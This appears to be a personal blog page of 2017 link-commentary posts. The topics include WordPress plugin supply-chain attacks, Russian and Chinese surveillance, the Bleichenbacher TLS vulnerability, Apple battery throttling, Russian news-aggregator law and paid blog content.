Category: Links

Categories
Links Writing

WordPress Supply Chain Attacks

Per Wordfence there are four reasons for supply-chain (i.e. plugin-based) attacks on WordPress installations:

The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.

Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.

Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.

Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er do wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.

The aforementioned points outline why acquiring and infecting WordPress plugins is a reasonable way of penetrating WordPress installs. However, I think that Wordfence is missing the most important reason that such attacks succeed: few actual users of WordPress are technically component to monitor what, exactly, their plugins are doing. Nor are the shared hosting services particularly good at identifying and alerting technically-illiterate users that their sites are compromised and what the site owners need to do to remediate the intrusion.

Trying to get individual users to more carefully monitor how their plugins work is a fool’s errand. What’s needed is for hosts to provide a community service and actively not just identify hijacked plugins (and sites) but, also, provide meaningful remediation processes. User education and alerts aren’t enough (or even moderately sufficient): companies must guide site owners through the process of cleaning their sites. Otherwise malware campaigns aimed at WordPress will persist and grow over time.

Categories
Links Photography

Photographic Rules and Human Physiology

Ming Thein:

We’ve touched on the cliches, we’ve touched on the physiology (much more detail in this and this article) but we haven’t touched on some things that generally make sense; I use the term ‘generally’ because as always there are exceptions dependent on the subject, scene and communicative intent of the photographer. Whilst for instance hard shadows usually make for interesting architectural images, they aren’t always so good for senior portraits or product photography. But this can be simplified into a logical statement like “shadows can assist with spatial orientation of a composition, and enhancing texture” – which I think is legitimate. But ultimately, the photographer has to decide if they actually want an obvious spatial orientation or not – they may not, for instance, if the intention is to make an extremely abstract composition. The example images given deliberately violate at least one, sometimes more, of the commonly bandied photographic rules – yet to my eyes at least, they still work.

I hadn’t really considered how the human body helps to dictate or guide the ‘rules’ of photography. While Ming Thein’s discussion is brief it’s perhaps useful for opening up new ways of thinking about the photos that we choose to take, and how deliberate shots vary from snapshots.

Categories
Links

A Deep Dive Into Russian Surveillance In The Silicon Valley Area

Via Foreign Policy:

This focus on signals and technical intelligence persisted until much more recently, multiple former U.S. intelligence officials told me. “It was almost like everyone they had there was a technical guy, as opposed to a human-intelligence guy,” one former official recalled. “The way they protected those people — they were rarely out in the community. It was work, home, work, home. When they’d go out and about, to play hockey or to drink, they’d be in a group. It was hard to penetrate.” The same official also noted that San Francisco was integral to the discovery by U.S. intelligence of a new class of Russian “technical-type” intelligence officer, working for the rough Russian equivalent of the National Security Agency, before this organization was eventually folded by Putin back into the FSB. This group, which was not based at the consulate itself, was identified via its members’ travel patterns — they would visit the Bay Area frequently — and the types of individuals, all in high-tech development, with whom they sought contact. According to this former U.S. official, these Russian intelligence officers were particularly interested in discussing cryptology and the Next Generation Internet program.

But it was the consulate’s location — perched high atop that hill in Pacific Heights, with a direct line of sight out to the ocean — that likely determined the concentration of signals activity. Certain types of highly encrypted communications cannot be transmitted over long distances, and multiple sources told me that U.S. officials believed that Russian intelligence potentially took advantage of the consulate’s location to communicate with submarines, trawlers, or listening posts located in international waters off the Northern California coast. (Russian intelligence officers may also have been remotely transmitting data to spy stations offshore, multiple former intelligence officials told me, explaining the odd behaviors on Stinson Beach.) It is also “very possible,” said one former intelligence official, that the Russians were using the San Francisco consulate to monitor the movements, and perhaps communications, of the dozen or so U.S. nuclear-armed submarines that routinely patrol the Pacific from their base in Washington state.

All in all, said this same official, it was “very likely” that the consulate functioned for Russia as a classified communications hub for the entire western United States — and, perhaps, the entire western part of the hemisphere.

There is a lot to this very long form piece, including descriptions of Russian intelligence operations and communications patterns, how lawful Russian overflights of American territory might be used for a variety of intelligence purposes, and the Trump administration’s likely cluelessness about why closing the Russian consulate in San Francisco was so significant. But most interestingly, for me, was how the consulate likely functioned as an outpost for Russian signals intelligence operations, both due to the depth of analysis in the article but also for what it tells us about how Western-allied consulates and diplomatic facilities are likely used.1 In effect, the concerns raised by former FBI and other American counter-intelligence officers speaks to how America and her allies may conduct their own forms of surveillance.

  1. In a provincial sense, the concerns and opinions espoused by American counter-intelligence officers also raises questions as to the role of Canada’s significant number of diplomatic facilities scattered throughout China and other regions where the United States is more challenged in building out State Department facilities.
Categories
Links Writing

The Dangers of Policy Learning

Via the New York Times:

Seizing on immigration as the cause of countless social and economic problems, Mr. Trump entered office with an agenda of symbolic but incompletely thought-out goals, the product not of rigorous policy debate but of emotionally charged personal interactions and an instinct for tapping into the nativist views of white working-class Americans.

Donald Trump isn’t so much tapping into ‘nativist’ views as, instead, exploiting citizens’ unawareness of the benefits of both immigration and trade. Immigrants contribute to the tax base, take less time off, and their direct descendants also contribute more to the tax base than ‘long-term’ citizens. Immigration is a net gain for ‘regular’ American workers but they haven’t been told just how, and why, their own lives and the social benefits they draw on are significantly improved by immigration into America.

Even as the administration was engaged in a court battle over the travel ban, it began to turn its attention to another way of tightening the border — by limiting the number of refugees admitted each year to the United States. And if there was one “deep state” stronghold of Obama holdovers that Mr. Trump and his allies suspected of undermining them on immigration, it was the State Department, which administers the refugee program.

The State Department is a core centre of American soft power; it’s programs, educational efforts, international outreach, and more are responsible for spreading American values around the world.1 That the administration is hollowing out the department is the truest evidence that the Trump administration is unaware of how, and why, America has managed to maintain its position in the world. While American military might is significantly responsible for the development and maintenance of its imperial stature in the world, this stature is solidified and extended through an adoption of American values. Such values are more than those associated with the military; they’re linked with those spread by staff from State who promote American values in more formal diplomatic efforts as well as the other range of activities undertaken by consular and embassy staff throughout the world.

It is incredibly hard to believe that the Trump administration is barely one year into a four year term. Given the lasting damage the administration has already done to America’s ability to project power around the world, it’s hard to imagine just what America’s stature will be in a few more years. But what’s most significant is that his administration has learned so quickly how to engage in the deliberate hollowing out of the institutions which have long been hallowed to Americans. This kind of learning is indicative that the administration might be successful on more of its more outrageous campaign promises, promises which are being supported by the Congress and Senate, and thus indicative of a broader series of values (or lack thereof) which are held by many American politicians.

  1. In the interests in disclosure: I will personally be enrolled in the State Department’s International Visitor Leadership Program in the coming fall.
Categories
Links Roundup Writing

The Roundup for December 16-22, 2017 Edition

Picture of a illuminated maple leaf
Canadian Heart by Christopher Parsons 

My less-busy times this week were spent writing out notes, cards, emails, and other correspondence to some of the most important people in my life. It’s been a challenging year; the world seems to be falling apart due to changes in American politics, deaths and illnesses by family and friends have been hard to take, and the tempo for high-quality professional work never really slows down. And so I took some time writing to the people I’ve most closely worked with, supported, or been supported by to thank them for just being present and active in my life.

I find writing these sorts of messages of thanks, encouragement, and praise challenging. They’re not the kind of thing that I have ever really received much of throughout my personal or professional life; it’s just not normal in my family to communicate our deep feelings for one another, and in academe the point is to move to the next project (and subject it to critique) instead of dwelling on past projects and receiving accolades for them. But as challenging as I find writing these messages they have a profound personal impact: by pulling together my thoughts and writing them down and sending them, I’m humbled by realizing just how blessed I am to be surrounded by the kind, funny, supporting, and amazing people in my life.

There used to be a time when a lot more holiday cards, notes, and messages were sent back and forth between people this time of year. And many people still send cards, but don’t take the time — five, ten, or even twenty minutes — to handwrite a real thought to whomever the recipient happens to be. But those are the cards and notes and emails that people carry with them for years, packing them carefully away as they move from one physical or digital home to another. They don’t cost a lot of money to produce, and in the case of email are almost entirely free, but they show that you’ve spent time thinking about a specific person. And that time, in and of itself, is indicative of someone’s importance in your life.

So before you go out and spend money on another present consider taking that time and, instead, writing a letter or note to whomever the recipient is. Chances are good that they’ll remember and treasure the message you left with them for longer than any material possession your might give them.

Some of the bigger news in the Apple world, this week, has focused on changes to how Apple treats older iPhones which are suffering battery degradation. While the majority of the reporting is focused on how iPhone 6 and 6s devices are experiencing slowdowns — which is the change Apple has imposed as of iOS version 11.2.0 — iPhone 7 devices are also exhibiting the slowdowns as they suffer battery degradation.

I’m of mixed minds on this. I see this as an effort by Apple to avoid having to replace batteries on older (but not THAT old) devices but in a sneaky way: the company’s lack of transparency means that it appears that Apple is trying to pull a fast one on consumers. This is especially the case for those consumers who’ve purchased Apple Care; if their devices are suffering known problems, then Apple should at the minimum be notifying owners to bring the devices in for servicing on a very proactive basis, and that doesn’t seem to have been the case.

So, on the one hand, this is Apple being sneaky.

But on the other it’s a semi-elegant engineering problem to resolve a hard-to-fix problem. We use our smartphones with such regularity and subject them (and, in particular, their batteries) to such exceptional abuse that degradation has to happen. And so I think that Apple stuffing processors into devices (at least in the current and last generation) that are excessive for daily use means the slowdowns are less problematic for most users. They might think that their devices are a bit slower but, generally, still be able to use them for about as long as they used to use them. And that length of use is what most people measure ‘battery life’ by so…maybe Apple is dealing with the problem the way users would actually prefer.

That Apple doesn’t change out batteries when they’re worn down, however, emphasizes that it’s a pretty good idea to resell your devices every year or so in order to get the best return for them as well as in order to enjoy the best performance from your iPhone. And I guess, as a byproduct, if you’re buying a second-hand iPhone you should definitely do a battery test before handing over your cash.

Inspiring Quotation

“Giving is about more than donating money. It’s about sharing your capabilities, content, and connections—and above all, giving others the chance to be heard, respected, and valued.”

– Adam Grant

Great Photography Shots

I’m absolutely blown away by the award winning photos for the 2017 Siena International Photo Awards.

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Products

Categories
Aside Links

In western China, thought police instill fear

From the Associated Press:

Southern Xinjiang, where Korla is located, is one of the most heavily policed places on earth.

In Hotan, police depots with flashing lights and foot patrols are set up every 500 meters. Motorcades of more than 40 armored vehicles rumble down city boulevards. Police checkpoints on every other block stop cars to check identification and smartphones for religious content.

Xinjiang’s published budget data shows public security spending this year is on track to increase 50 percent from 2016 to roughly 45 billion yuan ($6.8 billion) after rising 40 percent a year ago. It’s quadrupled since 2009, when a Uighur riot broke out in Urumqi, killing nearly 200 people.

But much of the policing goes unseen.

Shoppers entering the Hotan bazaar must pass through metal detectors and place their national identification cards on a reader while having their faces scanned. AP reporters were stopped outside a hotel by a police officer who said the public security bureau had been remotely tracking the reporters’ movements by watching surveillance camera footage.

The government’s tracking efforts have extended to vehicles, genes and even voices. A biometric data collection program appears to have been formalized last year under “Document No. 44,” a regional public security directive to “comprehensively collect three-dimensional portraits, voiceprints, DNA and fingerprints.” The document’s full text remains secret, but the AP found at least three contracts referring to the 2016 directive in recent purchase orders for equipment such as microphones and voice analyzers.

The extent of the of technical and human surveillance, and punishments that are meted out for failing to adequately monitor family members and friends, is horrifying.1 And while the surveillance undertaken in this area of China is particularly severe, the kinds of monitoring that occur in China is more extensive and ever-present throughout the country than many people who haven’t travelled into China can appreciate. The Chinese surveillance infrastructure is the kind of apparatus that exists to sustain itself, first and foremost, by ensuring that contrary ideologies and philosophies are threatened and — where possible — rendered impotent by way of threats and fear.

  1. While much of the contemporary surveillance is now provided by Chinese-based companies it’s worth remembering that, historically, this equipment was sold by Western companies.
Categories
Links Writing

19 Year-Old Vulnerability Continues to Haunt the Internet

Via Ars Technical:

A surprisingly big number of top-name websites—Facebook and PayPal among them—recently tested positive for a critical, 19-year-old vulnerability that allowed attackers to decrypt encrypted data and sign communications using the sites’ secret encryption key.

The vulnerability in the transport layer security protocol for Web encryption was disclosed in 1998 when researcher Daniel Bleichenbacher found it in the TLS predecessor known as secure sockets layer. A flaw in the algorithm that handles RSA encryption keys responded to certain types of errors in a way that divulged potentially sensitive information. With enough specially formed queries, attackers could exploit the weakness in a way that allowed them to decrypt ciphertext even when they didn’t have the secret decryption key. SSL architects responded by designing workarounds that suppressed the error messages rather than removing or rewriting the faulty RSA algorithm.

The vulnerability of Cisco’s ACE is concerning, because Cisco stopped supporting it several years ago and the researchers said the company has no plans to patch the product line. Even worse, it’s not possible to disable RSA encryption in the product, leaving users unable to follow one of the few possible workarounds for those unable to patch. What’s more, the researchers said Cisco is currently using ACE to serve content on cisco.com.

Companies that are responsible for providing critical infrastructure technologies need to be accountable for what they develop and sell. Imagine if a car company with a known-deficient vehicle refused to fix or repair it on the basis they didn’t support it any longer – there’d be class action suits almost immediately. The technology sector need to mature, and fast.

But as an aside, these are the sorts of weaknesses and vulnerabilities that the NSA and other national security agencies, along with private signals intelligence vendors, actively exploit. The actual ways in which cryptography is implemented are often rife with issues. One has to ask why Cisco and other major companies’ products were vulnerable in the first place but, also, whether the NSA or its sister agencies knew about the weaknesses and have been exploiting them instead of trying to better secure the public’s communications.

In theory the United States of America’s government, as well as the Canadian government, has a Vulnerabilities Equities Process (VEP). If this vulnerability was discovered but not disclosed it would be a damning indictment of the adequacy of the current VEP protocols.

Categories
Links

Security Planner by the Citizen Lab

From the Citizen Lab:1

Security Planner is an easy-to-use platform with tested, peer reviewed recommendations for staying safe online. With just a few clicks, Security Planner tailors straightforward recommendations based on someone’s digital habits and the technology they use. Recommendations are presented with clear language, making it easier to decide if they are right for someone. Our goal is to put people in a position to move from learning to action.

Our recommendations are developed by a peer review committee of experts from universities, nonprofits, and the private sector. The committee has decades of combined experience in digital security and produces recommendations that balance objectivity, accountability, and accessibility. This approach ensures that no private company can exercise influence over the products or services that we recommend. Security Planner is also overseen by an advisory board whose members include some of the world’s leading thinkers and practitioners in the digital security space.

Security Planner is a free tool that is designed to help everyone answer, and solve, their questions about online security. Check it out!

  1. In the interests of full disclosure, I’m an employee of the Citizen Lab though was only minimally involved in this particular project.
Categories
Links Writing

How Russia Polices Yandex

From Vice Motherboard:

This year, the “news aggregator law” came into effect in Russia. It requires websites that publish links to news stories with over one million daily users (Yandex.News has over six million daily users) to be responsible for all the content on their platform, which is an enormous responsibility.

“Our Yandex.News team has been actively working to retain a high quality service for our users following new regulations that impacted our service this past year,” Yandex told Motherboard in a statement, adding that to comply with new regulations, it reduced the number of sources that were aggregated from 7,000 to 1,000 with “official media licenses.”

The predicable result of the Russian government’s new law is that the government can better influence what information is surfaced to Russian citizens: when state news outlets release the same press release, en masse, Yandex1 and other major aggregators with a large number of readers are predominantly exposed to what the government wants them to see. So while Russia may interfere with foreign countries’ political processes by exploiting how social network and aggregator algorithms function (along with out-and-out illegal exfiltration and modification of communications data) they, themselves, are trying to immunize themselves to equivalent kinds of threats by way of the liabilities they place on the same kinds of companies which do business in Russia.

More broadly, the experience in Russia and changes in how Yandex operates should raise a warning flag for caution advocates in the Western world who are calling for social media companies to be (better) regulated, such as by striking down or modifying Section 230 of the Communications Decency Act (CDA). While there are clear dangers associated with these companies operating as contemporary digital sovereigns there are also risks associated with imposing harsh liability systems for publishing other persons’ content.

While such regulations might reduce some foreign interference in political systems it could simultaneously diminish the frequency at which legitimate alternative sources of information which are widely surfaced to the public. It remains unclear just how we should regulate the spread of malicious political messaging2 but, at the same time, it’s critical to ensure that any measures don’t have the detrimental effect of narrowing and diminishing the political conversations in which citizens can participate. It’s the very freedoms to have such conversations that distinguishes free democratic countries from those that are more autocratic.

  1. Sidenote: Yandex is the only website I’ve ever had to block from scraping my professional website because it was functionally acting as a DDoS.
  2. One idea would be to deliberately cut down on how easy it is to spread any and all information. By requiring additional manual effort to share content only the most motivated would share it. Requiring actual humans to share content with other humans, if done in a robust way, might cut down on the ability of bots to automatically propagate content as though ‘real’ people were sharing it.
Categories
Links Writing

Om Malik on the Blog Post Bribe Scandal

He writes:

The chase for cheap page views to arbitrage against advertising dollars is the real reason everyone at this mega page view factories willingly embraced this trend towards free content, which in turn left the whole experiment open to abuse. If you generate a lot of page views for these sites, you aren’t going away, because, in the end, it is all about page views.

On my other, professional, site I regularly receive requests from marketers to publish their content for some sort of payment. Many are outlandish in their requests whereas others have clearly done their homework and identified a range of posts the given brand wants to be associated with.

Some of the payment rates or product offerings are outlandish, others churlish, but none of them have ever overcome my baseline position: I own my professional web presence in order to build my reputation and brand. That brand is worth more than a few hundred or thousand dollars; it represents, at least in part, my ability to earn money over the span of the coming decades.

While there’s been some comic back and forth about charging marketers tens or hundreds of thousands of dollars to post other parties’ branded content, I think there is legitimately something to the idea. If you view your web presence as a long-term part of your career, and damaging that presence could potentially cost you in terms of future employment opportunities or consulting prospects, then that kind of valuation starts to make some sense.